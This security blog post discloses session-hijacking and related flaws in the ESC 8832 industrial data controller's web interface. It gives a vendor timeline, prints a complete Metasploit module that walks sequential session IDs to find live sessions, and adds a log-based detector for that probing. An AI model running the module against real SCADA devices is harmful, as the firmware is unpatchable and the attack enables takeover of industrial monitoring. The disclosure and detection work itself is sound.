th3r3g3nt Security Blog
Root for everyone

New Site

Good evening,

The site has been offline for a while, due to multiple factors - mainly lack of time. Also, my previous hosting service was straight up crap, but that is taken care of. Hopefully I will be able to rebuild a much simpler site, without WordPress and such. (Ain't nobody got time for maintaining / securing that junk...) So it's back to HTML and hand editing; there will be a lot of cosmetic trial and error, but hopefully nobody cares, because the content will not be affected. Help is always appreciated; reach out if you are bored and have time on your hands to donate.

ESC 8832 Data Controller multiple vulnerabilities (web interface)

Good evening,

This article discloses the details of vulnerabilities discovered in the ESC 8832 Data Controller. This device is often found on SCADA / ICS networks, as its function is data acquisition, processing and alarm generation for ambient (environmental) data. More precisely (from the manufacturer's manual), "The ESC Model 8832 Data System Controller is a microprocessor-based data acquisition system designed to acquire, process, store, report, and telemeter data in a multi-tasking environment." Basically it processes information from industrial sensors and does magic with the data, spitting back useful info.
The vendor, Environmental Systems Corporation (ESC), was very receptive and responsive to the vulnerabilities, and we coordinated the responsible disclosure details. According to ESC the product is no longer supported and cannot be fixed via a firmware upgrade: "Unfortunately, the 8832 Data Controller is now completely out of code space, and ESC has no technical ability to make any additional changes to the firmware." (ESC) Specifically, the web interface of the device was found vulnerable. The native client, installed on endpoints, was not tested.
The vendor recommendation for mitigation is to upgrade to the latest supported model. (Not tested by me) Alternatively, block port 80 with a firewall in front of the device. As another alternative, educate operators and users not to use the web interface for device management, as there are other means to manage the device. (Not tested by me)

[0] Summary & Timeline:

[1] Session Hijacking
[2] Predictable user session generation
[3] Unencrypted protocol
[4] Lack of user names
[5] Session token in HTTP GET

02/18/2015 – Vulnerability discovered
02/18/2015 – First contact with vendor
02/19/2015 – Response from vendor
02/20/2015 – Details submitted to vendor
02/23/2015 – Vendor verified all 5 issues, mutually agreed on 90 day full disclosure timeline
02/27/2015 – Vendor notified clients through email and support portal
05/28/2015 – Vendor was contacted with disclosure details and verbiage
05/29/2015 – Details, MSF module and POC were published on the researcher's web site. Submitted to

The Metasploit module goes like this (esc_8832_session.rb):

# This module requires Metasploit:
# Current source:

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ESC 8832 Data Controller Session Hijack Scanner',
      'Description' => %q{ This module detects if an active session is present and hijackable on the target ESC 8832 web interface.},
      'Author'      => ['Balazs Makany'],
      'References'  =>
        [
          ['URL', '']
        ],
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(80),
        OptBool.new('STOP_ON_SUCCESS', [true, "Stop when a live session was found", true])
      ], self.class)
  end

  def run_host(target_host)
    result = []
    begin
      # The device hands out small sequential session IDs, so walk 1..15.
      ('1'..'15').each do |u|
        print_status("Scanning #{target_host} - with Session ID '#{u}'")

        # Just to be on the safe side here.

        res = send_request_raw({
          'uri'     => '/escmenu.esp?sessionid=' + u + '&menuid=6',
          'method'  => 'GET',
          'headers' => { 'Connection' => 'Close' }
        }, 25)

        if (res and res.code == 200 and res.body)
          # A live session renders the configuration menu instead of the denial page.
          if res.body.match(/(Configuration\sMenu)/im)
            print_good("#{target_host} - Active Session found as #{u}!")
            print_good("Complete request: http://#{target_host}/escmenu.esp?sessionid=#{u}&menuid=6")
            report_note(
              :host  => target_host,
              :port  => datastore['RPORT'],
              # :type is required by report_note; value added during reconstruction of this listing.
              :type  => 'esc8832.session',
              :name  => "ESC 8832 Web Vulnerability",
              :info  => "Module #{self.fullname} confirmed a valid session (#{u}) on the ESC 8832 Web Interface"
            )
            break if datastore['STOP_ON_SUCCESS']
          end
          if res.body.match(/(Access\sDenied!)/im)
            print_status("  Dead session")
          end
        end
      end
    rescue ::Interrupt
      raise $!
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_error("Timeout or no connection on #{rhost}:#{rport}")
    rescue ::Exception => e
      print_error("#{rhost}:#{rport} Error: #{e.class} #{e} #{e.backtrace}")
    end
  end
end
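Because the session token travels in the GET query string, every probe the module above sends ends up in the access log of whatever proxy or firewall sits in front of the device. As an added defender-side example (not part of the original post or the module), this Ruby script parses common-log-format lines and flags a client that requests /escmenu.esp with many distinct sessionid values inside a short window, which is the enumeration pattern the scanner produces; the log lines, hosts and threshold are constructed samples.

```ruby
require 'time'
require 'uri'
require 'cgi'

# Constructed sample access-log lines (common log format): one client walking
# sessionid 1..5 within seconds, plus ordinary operator traffic. Not real device logs.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [29/May/2015:21:00:01 +0000] "GET /escmenu.esp?sessionid=1&menuid=6 HTTP/1.1" 200 512
  10.0.0.5 - - [29/May/2015:21:00:02 +0000] "GET /escmenu.esp?sessionid=2&menuid=6 HTTP/1.1" 200 512
  10.0.0.5 - - [29/May/2015:21:00:02 +0000] "GET /escmenu.esp?sessionid=3&menuid=6 HTTP/1.1" 200 512
  10.0.0.5 - - [29/May/2015:21:00:03 +0000] "GET /escmenu.esp?sessionid=4&menuid=6 HTTP/1.1" 200 2048
  10.0.0.5 - - [29/May/2015:21:00:03 +0000] "GET /escmenu.esp?sessionid=5&menuid=6 HTTP/1.1" 200 512
  10.0.0.9 - - [29/May/2015:21:00:10 +0000] "GET /escmenu.esp?sessionid=4&menuid=6 HTTP/1.1" 200 2048
  10.0.0.9 - - [29/May/2015:21:05:10 +0000] "GET /escmenu.esp?sessionid=4&menuid=2 HTTP/1.1" 200 1024
LOG

LINE_RE  = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3})/
TIME_FMT = '%d/%b/%Y:%H:%M:%S %z'

# Parse one CLF line into a hash; returns nil for lines that do not match.
def parse_line(line)
  m = LINE_RE.match(line)
  return nil unless m
  uri   = URI.parse(m[4])
  query = uri.query ? CGI.parse(uri.query) : {}
  { ip: m[1], time: Time.strptime(m[2], TIME_FMT), path: uri.path,
    sessionid: query.fetch('sessionid', []).first, status: m[5].to_i }
end

# Flag clients that request /escmenu.esp with `threshold` or more distinct
# sessionid values within `window` seconds (sliding window per client).
def detect_session_enumeration(log, threshold: 5, window: 60)
  events = log.each_line.map { |l| parse_line(l) }.compact
  events.select! { |e| e[:path] == '/escmenu.esp' && e[:sessionid] }
  alerts = []
  events.group_by { |e| e[:ip] }.each do |ip, evs|
    evs.sort_by! { |e| e[:time] }
    evs.each_index do |i|
      span = evs[i..-1].take_while { |e| e[:time] - evs[i][:time] <= window }
      ids  = span.map { |e| e[:sessionid] }.uniq
      next if ids.size < threshold
      alerts << { ip: ip, first_seen: evs[i][:time], session_ids: ids }
      break
    end
  end
  alerts
end

detect_session_enumeration(SAMPLE_LOG).each { |a| puts "#{a[:ip]} probed sessionids #{a[:session_ids].join(',')} starting #{a[:first_seen]}" }
```

Lowering the threshold to 1 turns the same script into an inventory of every client that used the web interface at all, which is useful when the mitigation is to move operators off port 80.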


Update: 2015-05-29

ESC 8832 Network Security Advisory – February 27, 2015

Good evening,